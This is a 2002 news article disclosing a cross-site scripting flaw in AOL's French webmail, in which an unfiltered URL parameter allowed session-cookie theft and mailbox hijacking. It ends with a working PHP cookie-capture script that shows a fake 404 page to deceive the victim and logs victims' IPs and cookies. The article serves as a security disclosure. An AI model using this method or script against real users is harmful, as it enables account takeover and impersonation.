[homepage]  [search]


2002-08-22 22:36

Big Hole in AOL : AOL flirts with filters!


One of our readers, Valdeux, told us the existence of a worldwide security hole in the AOL webmail. We tested this and came to the conclusion that a third party can access the mail of a AOL user, and this because of an unfiltered variable!
An AOL user can read his mail either through the proprietary AOL user interface, or at the http://www.aol.fr/aolmail URL. In the latter case, he must authenticate himself online using his username and his password. The AOL server sends back a simple identification string which is going to be appended to the subsequent accessed pages inside the site. Important: this string is modified whenever the users opens a new session to his mailbox. Once he had authentified himself, the user otains the list of his new mail. For example, when he reads the first mail, the following URL is displayed in the location bar of his browser: http://aolmail.aol.fr/mail.dci?id=1&count=3&box=inbox&list=1-1&read.x=1. where count is the total number of new mails (here, 3).

Let's cook the cookie!
The count variable is the source of the problem, since it is not filtered. It is therefore possible to replace it by a hacked code in order to ask the server to provide something else than the list of the new mail! From that initial flaw everything flows: a pirate may create a PHP page in order to record the data he receives, and then can insert a simple Javascript line to be inserted in the URL of the hijacked webmail account, for example this way :
http://aolmail.aol.fr/mail.dci?id=1&count=&box=inbox&list=1-14&read.x=1&.
This URL is then sent by mail or is present inside a hyperlink on the site. Whenever the user activates the hyperlink, the Document.location.href clause launches the PHP script. The document.cookie function, in turn, writes the authentification string in the cookie.txt file created by the script. Ultimately, all the hijacker has to do is, read the created cookie.txt and append the string to this URL :
http://aolmail.aol.fr/mail.dci?click=Cliquez+ici+pour+acc%E9der+%E0+votre+courrier&jscript=1&im=0&box
=inbox&tabs=yes&n_ .
He will connect to the victim's mailbox, impersonate him and write fake mails, etc! More viciously, if the URL which appears in the location bar looks suspicious to the cautious user, the PHP page may even display a 404 error page in order to divert his attention. Of course, we did alert AOL of the problem before any publication, but our alerts were completely fruitless for days! At the end, the System Architect of the french branch office himself replied: "Like in many companies", he said, "the customer hotline is operated by hostesses without a high level of expertise. They cannot always redirect to the proper person for a problem they do not grasp fully.". Kind. "I'm going to do my best to make the link between the hotline and the head of the management of incidents at the technical direction more reliable." Mid-July, AOL thanked us for the tip, while at the same time tempering it with: "The problem you described was known by the US teams[...] and today it's solved." ... Is the conclusion that AOL leaves wide open security breaches while hoping nobody will find out?



The PHP script used to capture the cookie
$date = date("d-m-Y");
// today's timestamp in european format
echo "Document not found

Error 404


Document not found

";
// fake 404 error page to divert attention
$fp = fopen("cookies.txt","a");
// going to append a new cookie to our file...
fputs($fp,
"=================================================");
fputs($fp, "\n");
fputs($fp, "$date : $REMOTE_ADDR left this cookie : $cookie \n");
// the line contains the date, the IP of the user and the cookie value
fputs($fp, "\n");
fclose($fp);
?>

Marc Rees


[homepage] [RSS] [archives]
[contact & legal & cookies] © ACBM